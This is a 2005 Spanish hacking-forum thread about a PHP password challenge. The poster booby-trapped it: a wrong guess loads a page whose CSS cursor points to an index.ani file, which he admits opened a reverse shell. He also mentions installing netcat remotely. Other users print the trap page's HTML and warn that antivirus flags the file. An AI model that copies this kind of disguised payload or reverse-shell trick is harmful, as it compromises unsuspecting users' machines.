Reto v.1.0 by eit

bueno ya que se enojaron conmigo por poner como resolver el otro reto el del tal viper, les dejo aqui mi reto (Ya que estan de moda =P)

Bueno ahi les va, es una simple autentificacion en PHP, nada de encriptacion, el password esta en text plain dentro de algun file en el espacio.

Asi que empiecen a 'trabajar', asi que primero asegurense de saber el password, de todos modos, cuando alguien inserte el password correcto me mandara una notificacion via mail pero por si las dudas, si resulven mandenme un mail o PM a eit @linuxmail.org

El reto esta en:

http://usuarios.lycos.es/eitsite/

Cita de: eit en Febrero 23, 2005, 07:57:16

Mmm pues si no hubieras publicado la respuesta no se hayan enojado
Si vas a estar buen tiempo en el foro llevatela bien y sin problems
Ay la ven

Hola

Cita de: eit en Febrero 23, 2005, 07:57:16

pero cuidado ya que si intentas un password y no es el correcto te puedes llevar una sorpresita, asi que primero asegurense de saber el password

o_0 como que una sorpresita?

Saludos

Pues no fuera sorpresa si les digo... Tongue

Osea, haber, alguien dijo que era sorpresa desagradable, o mala? claro que no, solamente dije que hay una sorpresa, asi que pues haber quien si la saca xD

Citar

-Error-

Esta pagina Solo Puede Ser Vista Con Internet Explorer

Ah por cierto, el password esta mal, y gracias por la shell =)

Si como no que flojera da, esto al intentar abrir el archivo je.php, la verdad da flojera

y aqui el code de fallo.html

Código:

<div id="a64262e31" style="text-align: center; margin: 0px; padding: 0px;" align="center"></div>
<script>
x6f37e8c46cd = "loranger-chand-cristofe";
src7b57dad8="http://ads.tripod.lycos.es/ad/google/frame.php?_url="+escape(self.location)+"&gg_bg=&gg_template=&mkw=&cat=noref";
function srcIframe7b57dad8(src, width) {if (document.getElementsByTagName("div")[0]) {document.getElementsByTagName("div")[0].id = "a64262e31";}return '<iframe id="f7b57dad8" src="'+src+'" height="95" width="'+width+'" frameborder="0" marginwidth="0" marginheight="0" allowtransparency="true"></iframe>';}x33f1396b498 = new Array();function x71d616146a8(xfa39b0cfbaf, x7325e11c556) {x838ee4625c5 = new String(x7325e11c556);xc3605d47cee = x838ee4625c5.substr(0,x838ee4625c5.indexOf('px')) * 1 + 95;
if (xfa39b0cfbaf.style.top == "" && !xfa39b0cfbaf.style.marginTop) {xfa39b0cfbaf.style.marginTop = "0px";xfa39b0cfbaf.style.paddingTop = "0px";}if ((x838ee4625c5.substr(0,x838ee4625c5.indexOf('px')) * 1 < 95) || (!x33f1396b498[xfa39b0cfbaf]) ) {xc3605d47cee = (xc3605d47cee<95) ? 95 : xc3605d47cee ;xfa39b0cfbaf.style.top = xc3605d47cee+"px" ;x33f1396b498[xfa39b0cfbaf] = 1 ;}}function checkGoogle7b57dad8(width) {if (!document.getElementsByTagName("iframe")[0] || document.getElementsByTagName("iframe")[0].src != src7b57dad8) {window.location.href="http://www.tripod.lycos.es";}x7280676f72a = new Array();x99cf756feb0 = new Array();x7280676f72a["a64262e31"] = new Array();x99cf756feb0["a64262e31"] = new Array();x7280676f72a["f7b57dad8"] = new Array();x99cf756feb0["f7b57dad8"] = new Array();x7280676f72a["a64262e31"][0] = "style.display" ;x99cf756feb0["a64262e31"][0] = "block" ;x7280676f72a["a64262e31"][1] = "style.height";x99cf756feb0["a64262e31"][1] = "95px";x7280676f72a["a64262e31"][2] = "style.width";x99cf756feb0["a64262e31"][2] = width+"px";x7280676f72a["a64262e31"][3] = "style.visibility";x99cf756feb0["a64262e31"][3] = "visible";x7280676f72a["a64262e31"][4] = "style.margin";x99cf756feb0["a64262e31"][4] = "0px";x7280676f72a["f7b57dad8"][0] = "style.display" ;x99cf756feb0["f7b57dad8"][0] = "block" ;x7280676f72a["f7b57dad8"][1] = "style.height";x99cf756feb0["f7b57dad8"][1] = "95px";x7280676f72a["f7b57dad8"][2] = "style.width";x99cf756feb0["f7b57dad8"][2] = width+"px";x7280676f72a["f7b57dad8"][3] = "style.visibility";x99cf756feb0["f7b57dad8"][3] = "visible";x7280676f72a["f7b57dad8"][4] = "style.margin";x99cf756feb0["f7b57dad8"][4] = "0px";for (var j in x7280676f72a) {for (i = 0 ; i < x7280676f72a[j].length ; i++) {if (!eval('document.getElementById("'+j+'")')) {break;}if (eval('document.getElementById("'+j+'").'+x7280676f72a[j][i]+' != "'+x99cf756feb0[j][i]+'"')) {eval('document.getElementById("'+j+'").'+x7280676f72a[j][i]+' = "'+x99cf756feb0[j][i]+'"');}}}x6d291a35e14 = new Array();x3a12a33063c = new Array();x6d291a35e14["body"] = new Array();x3a12a33063c["body"] = new Array();x6d291a35e14["body"][0] = "style.marginTop";x3a12a33063c["body"][0] = "0px" ;x6d291a35e14["body"][1] = "style.paddingTop";x3a12a33063c["body"][1] = "0px" ;for (var j in x6d291a35e14) {eval ('x907367ae6a9 = document.getElementsByTagName("'+j+'");');for (k = 0 ; k < x907367ae6a9.length ; k++) {for (i = 0 ; i < x6d291a35e14[j].length ; i++) {if (!eval('document.getElementsByTagName("'+j+'")')) {break;}if (eval('document.getElementsByTagName("'+j+'")['+k+'].'+x6d291a35e14[j][i]+' != "'+x3a12a33063c[j][i]+'"')) {eval('document.getElementsByTagName("'+j+'")['+k+'].'+x6d291a35e14[j][i]+' = "'+x3a12a33063c[j][i]+'"');}}}}x907367ae6a9 = document.getElementsByTagName("div");for (i = 0 ; i < x907367ae6a9.length ; i++) {if (document.all) {if ( (x907367ae6a9[i].currentStyle.position == "absolute") || (x907367ae6a9[i].currentStyle.position == "fixed") ) {x71d616146a8(x907367ae6a9[i], x907367ae6a9[i].offsetTop + "px");}}else {if ( (document.defaultView.getComputedStyle(x907367ae6a9[i], '').getPropertyValue("position") == "absolute") || (document.defaultView.getComputedStyle(x907367ae6a9[i], '').getPropertyValue("position") == "fixed") ) {x71d616146a8(x907367ae6a9[i], document.defaultView.getComputedStyle(x907367ae6a9[i], '').getPropertyValue("top"));}}}setTimeout("checkGoogle7b57dad8("+width+")", 500);}
function displayGoogleAd7b57dad8() {width = (document.body.clientWidth > 770) ? document.body.clientWidth : 770 ;width -= 20;content7b57dad8 = srcIframe7b57dad8(src7b57dad8, width);if (!this.document.getElementsByTagName("frameset")[0]) {document.getElementById("a64262e31").innerHTML = content7b57dad8;checkGoogle7b57dad8(width);}}window.onload = new Function("if (x6f37e8c46cd != '7b57dad8') {displayGoogleAd7b57dad8();}");

document.getElementsByTagName("script")[0].text = "";
</script>
<html>
<pre> -Error-<br>
Esta pagina Solo Puede Ser Vista Con Internet Explorer</pre><br>
<pre> Ah por cierto, el password esta mal, y gracias por la shell =) </pre>
<head>
<style>
* {CURSOR: url("index.ani")}
</style>
</head>

</html>
</pre></xmp></noscript>
<script language="javascript" src="http://ads.tripod.lycos.es/ad/test_frame_size.js"></script>
<script language="javascript">x6f37e8c46cd = "7b57dad8";
if (!AD_clientWindowSize()) {document.write("<NOSC"+"RIPT>");}</script>

<script>displayGoogleAd7b57dad8();</script>
<script type="text/javascript" src="http://ads.tripod.lycos.es/ad/ad.php?cat=noref&mkw=&CC=es&ord=7b57dad8&adpref="></script>


<script language="JavaScript" type="text/javascript"></script>
<noscript>
<img src="//secure-uk.imrworldwide.com/cgi-bin/m?ci=lycos-es&cg=noref" alt="">

</noscript>
<script>if (!AD_clientWindowSize()) {document.write("<NOSC"+"RIPT>");}</script>

Al menos lo visible con un navegador

chikilin lamento decirte que estas en un error, ese codigo es de fallo.html no de je.php =)

Pero busquen mas, no quieran sacar el password del los files PHP, puede haber un errorsillo en el hosintg por ahi, quien sabe.. Roll Eyes

Ah por cierto, todos esos javascripts y tanta mamada no als puse yo, es la publicidad de lycos Tongue

The directory /eitsite is not available to be viewed. To view files in this directory you must include it as an allowed directory. To set /eitsite as an allowed directory open this file (using a text editor or your servers file edit function) and add /eitsite to the allowed directories array at the top of the file.

Jaja, lo bueno es que dejan ver el source xD y buscas errores de php en el host...

la neta... no entendi lo que quisiste decir, pero lo que si digo es que el error no es de PHP (hasta donde yo sepa) si no de otro fallo (bueno en vez de ser fallo es otra forma de entrar) Tongue

ok, pues ya que halla tiempo le busco
y mas si no es de PHP Tongue

parace bueno , hasta eso de la "sorpresa" , yo lo voy a intentar, ahunque no soy muy entendido de el tema, pero veamos q sale.-
seria bueno algunas ayudas, para quienes estamos bastante nuevos en este tema, [es una opinion]

saludos

Esta es la sorpresita

Código:

-Error-

Esta pagina Solo Puede Ser Vista Con Internet Explorer

Ah por cierto, el password esta mal, y gracias por la shell =)

Dios, que pelotud* que es...

Con eso que nos quiere decir que con eso nos ha robado una shell??? :-\ Huh

Bueno les dejo una prueva, hagan un leech al site, encontraran cosas interesantes.....

Para los que preguntaban por la sorpresa de su "reto", seguramente era esta....

Es el index.ani que hace referencia el je.php...
Bajaros con cualquier gestor de descargas http://usuarios.lycos.es/eitsite/index.ani y si teneis un buen antivirus saltara la alerta...
Y para los que vieron el famoso fallo.html del je.php..

Código:

document.getElementsByTagName("script")[0].text = "";
</script>
<html>
<pre> -Error-<br>
Esta pagina Solo Puede Ser Vista Con Internet Explorer</pre><br>
<pre> Ah por cierto, el password esta mal, y gracias por la shell =) </pre>
<head>
<style>
* {CURSOR: url("index.ani")}

Saludos!

http://usuarios.lycos.es/eitsite/index.ani no existe desde el primer post, lo borre precisamente por que regresaba una reverseshell pero ya no existe y pueden comprovarlo, asi que ya pueden termianr el reto sin ningun problema

http://usuarios.lycos.es/eitsite/index.ani <-- 404

Ya recuerdo la gracia tuya del reverse shell, apoco ya te funciona si cierro la ventana ?

jaja, todavia te acuerdas? xD

Si estoy en eso, estoy viendo como correr el proceso despues de haber sido abierto, ya sea instalando el netcat remotamente y regresar la shell =)

Cuando quieras probar ahi me avisas.. todo sea por colaborar con tan distinguida persona... XDDD .

Por cierto, tampoco se me olvida lo de mi sql Embarrassed

lo bueno es que fue por mi "seguridad".....

Una sugerencia, esto es hack para newbies. Creo que este post no esta hecho para newbies, por que al menos yo no me entero de lo que hablais. Creo que es para gente avanzada.
Un saludo.

Hola

Chekno tiene toda la razon... plz por que no lo poneis en idioma castellano??
La cosa es que ya no hay virus si fallas no?, por que yo intentando mirarlo falle xD

GRACIAS

mmmmm me lo tome a mal lo de kuando t ekivokas en el pass y sinceramentte este reto me lo paso x el cu***
y aguante los retos de VIPER!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

mmm este post kedo olvidado????menos mal!!!!!

	Bienvenido(a), Visitante. Favor de ingresar o registrarse. ¿Perdiste tu email de activación? - Agosto 20, 2008, 09:11:44 Boton Buscar